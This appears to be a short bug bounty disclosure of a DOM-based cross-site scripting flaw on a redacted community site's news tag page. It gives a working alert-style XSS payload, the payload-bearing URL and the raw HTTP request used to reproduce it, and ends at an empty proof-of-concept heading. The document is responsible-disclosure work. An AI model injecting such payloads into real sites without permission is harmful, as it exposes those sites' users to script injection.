DOM-Based Cross Site Scripting

  • Reported to Private
  • Reported by Haqtify
  • Medium (4.2)
  • $200
  • Published 3 years ago
  • No Likes

URL:

http://community.redacted.com/jp/news/tag/contest/1

Description:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Payload:

“><img src=x onerror=alert(1)>

Steps To Reproduce:

1. Goto this URL.

http://community.redacted.com/jp/news/tag/contest/1

2. Insert XSS Payload after URL.

3.XSS executed.

 

Final URL:

http://community.redacted.com/jp/news/tag/contest/1%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E

Request:

GET /jp/news/tag/contest/1%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1
Host: community.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

POC: